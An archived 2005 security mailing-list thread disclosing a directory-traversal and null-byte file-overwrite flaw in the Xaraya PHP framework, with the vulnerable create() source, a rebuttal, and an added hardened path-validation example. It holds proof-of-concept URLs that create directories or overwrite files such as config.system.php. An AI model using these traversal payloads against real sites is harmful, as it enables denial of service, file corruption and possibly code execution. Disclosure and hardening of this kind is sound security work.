
View Full Version : Xaraya <= 1.0.0 RC4 D.O.S / file corruption



retrogod@aliceposta.it
30/11/05, 04:30
Xaraya <= 1.0.0 RC4 D.O.S / file corruption

software:
site: http://www.xaraya.com
description: "Xaraya 1.0 Core is an Open Source web application framework
written in PHP"

vulnerable code in the create() function in xarMLSXML2PHPBackend.php:



i) you can create an empty dir; in some cases this leads to a D.O.S. condition. PoC:

http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php
http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htaccess




ii) you can overwrite any file on the target system, using a null char

example, D.O.S., overwriting a system file:

http://[target]/[path_to_xaraya]/index.php?module=../../../../config.system.php%00

this could even lead to a remote code execution condition, if a user overwrites
some file where an inclusion path is defined





rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/xaraya1DOS.hmtl

Paul Laudanski
30/11/05, 20:45
On 29 Nov 2005 retrogod@aliceposta.it wrote:

> Xaraya <= 1.0.0 RC4 D.O.S / file corruption
>
> software:
> site: http://www.xaraya.com
> description: "Xaraya 1.0 Core is an Open Source web application framework
> written in PHP"
> i) you can create an empty dir; in some cases this leads to a D.O.S. condition. PoC:
>
> http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php
> http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htaccess

Being that Xaraya is a fork of PostNuke, which is a fork of PHP-Nuke,
the input would already have been checked for directory traversal among
other things.

--
Paul Laudanski, Microsoft MVP Windows-Security
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com

retrogod@securityfocus.com, at@securityfocus.com,
01/12/05, 00:00
it's not an inclusion bug, it is a fopen()/file corruption bug. This is the vulnerable code in xarMLSXML2PHPBackend.php:
....
function create($ctxType, $ctxName)
{
    assert('!empty($this->baseDir)');
    assert('!empty($this->baseXMLDir)');
    $this->fileName = $this->baseDir;
    $this->xmlFileName = $this->baseXMLDir;

    if (!ereg("^[a-z]+:$", $ctxType)) {
        list($prefix,$directory) = explode(':',$ctxType);
        if ($directory != "") {
            $this->fileName .= $directory . "/";
            $this->xmlFileName .= $directory . "/";
        }
    }

    $dirForMkDir = $this->fileName;
    if (!file_exists($dirForMkDir)) xarMLS__mkdirr($dirForMkDir, 0777);

    $this->fileName .= $ctxName . ".php";
    $this->xmlFileName .= $ctxName . ".xml";

    $xmlFileExists = false;
    if (file_exists($this->xmlFileName)) {
        if (!($fp1 = fopen($this->xmlFileName, "r"))) {
            xarLogMessage("Could not open XML input: ".$this->xmlFileName);
        }
        $data = fread($fp1, filesize($this->xmlFileName));
        fclose($fp1);
        $xml_parser = xml_parser_create();
        xml_parse_into_struct($xml_parser, $data, $vals, $index);
        xml_parser_free($xml_parser);
        $xmlFileExists = true;
    } else {
        xarLogMessage("MLS Could not find XML input: ".$this->xmlFileName);
    }

    $fp2 = @fopen ($this->fileName, "w" );
    if ($fp2 !== false) {
        fputs($fp2, '<?php'."\n");
        fputs($fp2, 'global $xarML_PHPBackend_entries;'."\n");
        fputs($fp2, 'global $xarML_PHPBackend_keyEntries;'."\n");
        if ($xmlFileExists) {
            foreach ($vals as $node) {
                if (!array_key_exists('tag',$node)) continue;
                if (!array_key_exists('value',$node)) $node['value'] = '';
                if ($node['tag'] == 'STRING') {
                    $node['value'] = str_replace('\'', '\\\'', $node['value']);
                    $start = '$xarML_PHPBackend_entries[\''.$node['value']."']";
                } elseif ($node['tag'] == 'KEY') {
                    $node['value'] = str_replace('\'', '\\\'', $node['value']);
                    $start = '$xarML_PHPBackend_keyEntries[\''.$node['value']."']";
                } elseif ($node['tag'] == 'TRANSLATION') {
                    if ($this->outCharset != 'utf-8') {
                        $node['value'] = $GLOBALS['xarMLS_newEncoding']->convert($node['value'], 'utf-8', $this->outCharset, 0);
                    }
                    $node['value'] = str_replace('\'', '\\\'', $node['value']);
                    if (!empty($node['value'])) {
                        fputs($fp2, $start . " = '".$node['value']."';\n");
                    }
                }
            }
        }
        fputs($fp2, "?>");
        fclose($fp2);
    } else {
        xarLogMessage("Could not create file: ".$this->fileName);
        global $xarML_PHPBackend_entries;
        global $xarML_PHPBackend_keyEntries;
        if ($xmlFileExists) {
            foreach ($vals as $node) {
                if (!array_key_exists('tag',$node)) continue;
                if (!array_key_exists('value',$node)) $node['value'] = '';
                if ($node['tag'] == 'STRING') {
                    $node['value'] = str_replace('\'', '\\\'', $node['value']);
                    $entryIndex = $node['value'];
                    $entryType = 'string';
                } elseif ($node['tag'] == 'KEY') {
                    $node['value'] = str_replace('\'', '\\\'', $node['value']);
                    $entryIndex = $node['value'];
                    $entryType = 'key';
                } elseif ($node['tag'] == 'TRANSLATION') {
                    if ($this->outCharset != 'utf-8') {
                        $node['value'] = $GLOBALS['xarMLS_newEncoding']->convert($node['value'], 'utf-8', $this->outCharset, 0);
                    }
                    $node['value'] = str_replace('\'', '\\\'', $node['value']);
                    if ($entryType == 'string') {
                        $xarML_PHPBackend_entries[$entryIndex] = $node['value'];
                    } elseif ($entryType == 'key') {
                        $xarML_PHPBackend_keyEntries[$entryIndex] = $node['value'];
                    }
                }
            }
        }
    }

    return true;
}
}
?>

however, this is my proof of concept exploit:

http://www.milw0rm.com/id.php?id=1345
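As an added illustration of how the mkdir()/fopen() path handling in the posted create() function can be hardened (this is not code from the thread or from Xaraya; the function and variable names are assumptions of this example), a path builder that accepts only identifier-like context names, so traversal sequences and the null byte never reach the filesystem calls:

```php
<?php
// Added example, not from the thread or from Xaraya: a defensive path
// builder for the create() routine quoted above. The context name and the
// optional "prefix:directory" part must be plain identifiers, so "../", "/"
// and the %00 null byte are refused before any mkdir() or fopen() happens.
// Function and variable names are this example's own.

function xarMLS_safePath($baseDir, $ctxType, $ctxName)
{
    $ident = '/^[A-Za-z0-9_]{1,64}\z/';   // whitelist; \z also stops "\n"
    if (!preg_match($ident, $ctxName)) {
        throw new InvalidArgumentException('bad context name');
    }
    $directory = '';
    if (strpos($ctxType, ':') !== false) {
        // "prefix:" alone means no sub-directory, as in the original code
        list(, $directory) = explode(':', $ctxType, 2);
        if ($directory !== '' && !preg_match($ident, $directory)) {
            throw new InvalidArgumentException('bad context directory');
        }
    }
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    $dir = $directory === '' ? $base : $base . DIRECTORY_SEPARATOR . $directory;
    if (!is_dir($dir) && !mkdir($dir, 0755, true)) {   // 0755, not 0777
        throw new RuntimeException('cannot create directory');
    }
    // Defence in depth: the canonical directory must still sit under $base.
    $canon = realpath($dir);
    if ($canon === false ||
        strncmp($canon . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR,
                strlen($base) + 1) !== 0) {
        throw new RuntimeException('path escapes base directory');
    }
    return array(
        'php' => $canon . DIRECTORY_SEPARATOR . $ctxName . '.php',
        'xml' => $canon . DIRECTORY_SEPARATOR . $ctxName . '.xml',
    );
}

// Constructed inputs mirroring the thread's requests: each one is refused.
$tmp = sys_get_temp_dir();
$bad = array("../../../../config.system.php\0", "../../../../../.htaccess");
foreach ($bad as $name) {
    try { xarMLS_safePath($tmp, 'core:', $name); echo "accepted\n"; }
    catch (InvalidArgumentException $e) { echo 'refused: ' . $e->getMessage() . "\n"; }
}
print_r(xarMLS_safePath($tmp, 'core:', 'en_US'));   // normal name passes
```

The whitelist is the real control; the realpath() prefix comparison only guards against a later change that loosens it.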